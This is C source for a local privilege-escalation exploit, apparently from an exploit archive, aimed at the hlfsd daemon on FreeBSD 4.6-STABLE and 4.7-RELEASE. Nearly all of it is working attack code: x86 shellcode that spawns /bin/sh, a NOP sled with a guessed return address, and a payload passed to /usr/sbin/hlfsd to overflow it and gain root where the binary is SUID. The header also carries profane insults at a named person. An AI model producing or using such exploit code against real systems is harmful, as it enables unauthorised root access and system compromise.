Hlfsd local exploit tested on FreeBSD 4.6-STABLE and 4.7-RELEASE. Hlfsd is not SUID by default.
ec0c364ca5a80087101a5cb10e3a7355c48c4a10f37fb0d2ec5b278420d7a08a
Hi Packetstormsecurity guys.
/*
* hlfsd-xp.c
* Local root exploit for hlfsd.
* 1) FreeBSD 4.7-RELEASE
* 2) FreeBSD 4.6-STABLE
* hlfsd not suid by default, but if... g0t r00t.
* argv[1] - buffer size (def: 1000), argv[2] - offset (def: 0)
* Thanks to: thefate, v1pee, Billi_k1d, meff, lbyte,xaoc
* Fuckz to: S|{IF yestarday you hurt me bad, you think I'm worse than
* you are? fuck you then!
*
* r00terX, NERF gr0up. (c) 2002 <under@azerinet.com>, nerf.ru
* advisory by division7
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1041
char freebsdshellcode[] ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
struct TARGET {
char *type;
char *shellcode;
int pad;
};
struct TARGET targets [] = {
{"Freebsd 4.6-STABLE -x86 shellcode",freebsdshellcode,120},
{"Freebsd 4.7-RELEASE -x86 shellcode",freebsdshellcode,0},
{NULL, NULL, 0}
};
void ussage (char *argv);
int main(int argc, char **argv) {
char *buff, *ptr;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i;
int target;
if ((argc < 2))
ussage(argv[0]);
target = atoi(argv[1]);
if(!(buff = malloc(bsize))) {
printf("Can\`t allocate memory.\n");
exit(0);
}
addr = get_sp() - targets[target].pad;
printf("Using target: %s\n", targets[target].type);
printf("Using address: 0x%x\n", addr);
printf("Using buffer size: %d\n", DEFAULT_BUFFER_SIZE);
printf("Using offset: %d\n", targets[target].pad);
ptr = buff;
addr_ptr = (long *) ptr;
for(i=0; i<bsize; i+=4)
*(addr_ptr++) = addr;
for(i=0;i < bsize/2;i++)
buff[i]=NOP;
ptr = buff+((bsize/2)-(strlen(targets[target].shellcode)/2));
for(i=0;i < strlen(targets[target].shellcode); i++)
*(ptr++) = targets[target].shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/usr/sbin/hlfsd -x $EGG");
}
void list_targets () {
int i;
for (i=0; targets[i].type != NULL; i++) {
fprintf (stderr, "%d) - %s\n", i, targets[i].type);
}
}
void ussage (char *argv) {
printf ("%s - hlfsd local exploit\n",argv);
printf ("written by r00terX\n\n");
printf ("Ussage %s <target type> \ntargets avalible:\n\n");
list_targets ();
exit(0);
}